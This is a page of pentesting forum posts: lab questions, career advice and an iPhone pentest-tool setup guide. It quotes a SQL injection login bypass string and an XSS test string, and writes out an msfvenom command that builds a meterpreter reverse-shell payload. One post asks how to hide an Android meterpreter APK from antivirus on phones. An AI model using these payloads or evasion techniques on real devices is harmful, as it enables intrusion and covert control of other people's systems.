Search the Community

Hi Guys, Having rooted the nexus 6p (again), downloaded the latest version of NetHunter for the android device, I was wondering if anyone else is using it without problems? Cheers 😎

So I want to get into a career of pen-testing I just want to know some ideas of os (going to be kali) and laptops. thx, cameron

Hello team, I'm new here as I am new to Penetration testing, my next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server, I successfully finished with the Win XP in all aspects as for the CentOS I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information but that was it, I tried using scripts (<script>alert(1);</script>) but nothing worked, nessus scan showed it's XSS vulnerable. I guess my main point is how further can I dig into the target and how? Cheers

I just installed virtual box and im running linux mint 18.1. Can you explain how i would attack my own VM on my system?

Hello there, I am looking for hackers to test our tools. Basically our tools are used for static analysis in source code and binaries. We want to make our tools the most accurate so we need users to report false positives. If you're intrested you can contact me through twitter and or email. https://twitter.com/q_analysis_ https://q-analysis.com/ support@q-analysis.com If you do accept this offer you will have free access to our tools for a year. Thanks !!!

Hi Guys, I'm learning penetration testing and need some help with escalating my privileges on a Red Hat 9 (Shrike - kernel 2.4.20-8 - http://archive.download.redhat.com/pub/redhat/linux/9/en/iso/i386/) test VM. I'm stuck.... I'm using this exploit (https://www.exploit-db.com/exploits/160/) and keep getting "Segmentation fault" errors. I've tried others as well that should work but all appear to give me the same error. I could not find any helpful information on how to resolve this. I've tried debugging the code but I'm not a programmer so it's been a pain, also tired changing RAM size and running the VM on different host machines as some suggested online but no luck. Anyone has any ideas or suggestions? I can provide more information if need be. Any help would be greatly appreciated. Here a screenshot: https://imgur.com/a/7mFHI Thanks.

Hello everyone i'm new to the forums and just got my new TETRA loving it. I have been slowly but steadily educating myself in hacking over the last 2 years last year went to Defcon and this august i plan to again the reason being is i would love to get a job in the IT industry (FYI i poor coffee weight now at america's Favorite shit coffee house) but every night i come home and work on my CCNA figure it would be a good first credential to pick up to move into a IT job i guess why i'm posting this i would love to hear from others on tip as far as moving towards a decent job at least one that pays me better then 10.25hr and i don't burn myself on a daily bases for minimum wage. In the long run i would love to be a professional pen tester going to Defcon so far has been well worth it have met like minded people and made friends.

Howdy All, I am very new to the concept of network testing. Currently, I run my Intranet (2 desktops, a laptop, and a handful of smartphones) behind a standard router/modem, and utilizing firewalls and anti-virus/malware tools. But I cannot shake the thought that I might be dropping the ball somewhere... 1. Is there something I can do to test and see if I have any vulnerabilities I can shore-up? 2. Are there ways I can check and see if others are attempting to gain access to my home network from the outside? Thanks ahead o' time guys! Keep up the good work! Uncle Gabe BTW - Where in Land Sakes, did you get that OLD avatar??? PLEASE, let me update it!

I've been using Kali for a long time and I'm comfortable with it but I feel it's time to move on. From what I understand, since it is an OS strictly for pentesting it doesn't take into account the user's own security. In the past I've used Kali for brief periods of time without worrying about the security of the system I was on. However, if I am to become better at pentesting then I must upgrade the tools I use. I also want to practice on the same system I would use for actual pentests. Which OS can you recommend that provides the power and tool selection that Kali does but also provides security similar to Tails? I know there won't be a perfect cross-over but I'm looking for the closest one available. I have found a list of pentesting distros including BlackArch (which I've used briefly), BackBox, and ArchAssault. I'll continue researching but would appreciate your opinions and experiences with these various distros.

Hi guys, I was recently looking to get a cheap laptop to stay portable when having some fun with the pineapple, but then I thought; what if I wanted to do some bruteforcing on the go? Then I would have to use its GPU. But I doubt that a cheap laptop will get the job done fast enough on the graphics side. So I did some looking around and found a few external GPU adapters. As long as your laptop has a PCIe slot, you should be good to go. And although it goes through PCIe x2 interface, I think it shouldn’t even matter when using the card for number crunching …as long as you have enough juice to power the thing (car charger adapter for example or just a large battery). This way if you already have a good graphics card, you can take it with you to do something a little more serious than what you could with a laptop onboard GPU. Anyway, I just wanted to share this with you because I thought that maybe this would be interesting for you guys to check out, discuss and have some fun with. Tell me what you think

Hi, I have a great interest in computer security and research exploits and pen-testing techniques as a hobby. Recently I started looking into mobile devices. Android in specific because of the stagefright exploit that was recently released but I'm not an expert so I'm having trouble trying to use it. I usually use metasploit for my testing but not sure how to use the stagefright exploit with it. All I've been able to do so far is create an apk file with an android meterpreter payload and set up a multi handler listener in a vps so I can catch the connections. It works on some phones if it doesn't have any security on them but when they have lookout or some other anti-virus software it kills the sessions or doesn't allow them at all. I'm looking for a little help. Is there a way to encode the apk file so it doesn't get detected by the anti-virus software or another attack that should be more successful like embedding the payload on a web page? Also if anyone can point me in the right direction on how to use the stagefright exploit to create a meterpreter session I would appreciate it. Thanks,

I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom. For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG) Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong? Here is an example of one of my payloads root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=192.168.32.130 LPORT=4444 > Kittens.exe

Hey! Tested on the iPhone 4 running Ios 7 jail broken by using evasion7 I wanted to talk about using a iDevice (ios 7)as a pen testing device . [ Noob Friendly ] First off , why should you use a iDevice as a pen testing device ? Its portable Not noticeable it looks cool :) its pretty fast IOS == Unix It can easily be used with the pineapple ;) Let's move on , so how do you make your iDevice into a pentesting device ? First you need jailbreak your iDevice (eg ; Evasion7) Open Cydia Adding repositories by going to "Manage" and then "Sources" and then "edit" and then "add" Then add all these repositories :: http://cydia.myrepospace.com/Boo/ http://ininjas.com/repo/ http://cydia.xsellize.com/ When that's done . click on "http://ininjas.com/repo/" and scroll down until you see "Metasploit" then click on "Metasploit" and then click on "edit" and then click on "Install" When that's done go back and scroll until you see "Aircrack-ng" and the click on it and install just like previous when thats done install Auto Reconnect , Mobile terminal ,beEF, CUPP, Dsniff Suite , dsniff-fr0g , Ettercap-ng GTk , Ettercap No GTK , Evil Grade ,iAHT, iPwN ,John the Ripper, Low Orbit Ion Cannon , NBTScan, Nikto2, Nmap , Pirni ,Ruby 1.8.6 , Searchsploit , SSLstrip , Wordlists , XSSer , xterm , IWep , SET (not the one thats called Social Engineering Toolkit but the one thats called SET!!) , OpenSSH ! , iSSH I know that are alot of tools and it will take you some time but when its done you have an awesome pentesting device ! When you Installed all those Tools open Mobile terminal or xterm and type "su" and fill in your password "standard password is :: alpine " then type cd /pentest and there are all your tools . Make sure you go to /pentest/exploits/SET/config and open the set_config and change the metasploit path to the path where metasploit is instaleld. If you need help setting up the other tools (should work fine) or if you have any problems feel free to leave them below . Enjoy your simple but powerful pen testing device ;) Merry Christmas! :) - Jesse

I'm not completely new to pentesting and Im not completely new to Kali Linux, We've been using Kali Linux for Everything at school. I have Kali on a usb I boot up everything works great. Recently I was given a hp Chromebook 14 and decided to install Kali using the crouton method. The distro is bare so you have to install a metapackage after the initial setup. I installed the kali-linux-top10 which is the top 10 security pentesting tools. Today I finally sat down for the first time to really play around with Kali and to Pentest my network which I did and I found a few vulnerable ports on another laptop running in the house so I decided to use metasploit and see what I could get my hands on but i got this *] Starting the Metasploit Framework console.../[-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432? So none of the exploits are working..... I know this is a user error and the fix has to be something simple but i could use some help .....any suggestions?